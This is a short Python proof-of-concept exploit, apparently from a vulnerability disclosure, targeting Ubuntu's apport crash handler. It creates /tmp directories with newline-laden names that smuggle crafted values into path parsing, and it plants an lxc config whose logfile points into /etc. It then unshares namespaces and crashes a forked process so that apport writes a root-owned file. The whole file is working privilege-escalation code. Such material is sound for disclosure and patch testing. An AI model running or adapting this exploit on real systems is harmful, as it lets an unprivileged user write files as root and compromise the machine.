#!/usr/bin/python3
# Test script for apport vulnerability.
#  taviso@cmpxchg8b.com

import socket, os, signal
import ctypes

os.mkdir('/tmp/\n0 1 2 3 4 5 6 ')
os.mkdir('/tmp/\n0 1 2 3 4 5 6 /tmp')
os.mkdir('/tmp/\n0 1 2 3 4 5 6 /tmp/exploit')
os.mkdir('/tmp/\n0 1 2 3 4 5 6 /tmp/exploit/exploit')
os.mkdir('/tmp/exploit/')
os.mkdir('/tmp/exploit/exploit/')

f = open('/tmp/exploit/exploit/config', 'w')
f.write("lxc.logfile = /etc/rootfiletest\n")
f.close()

sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind('/tmp/\n0 1 2 3 4 5 6 /tmp/exploit/exploit/command')
sock.listen(1)

libc = ctypes.CDLL("libc.so.6")

libc.unshare(0x20000000|0x10000000)

if libc.fork() == 0:
	if libc.fork() == 0:
		os.kill(libc.getpid(), signal.SIGSEGV)
	else:
		libc.waitpid(-1, 0, 0)
else:
	libc.waitpid(-1, 0, 0)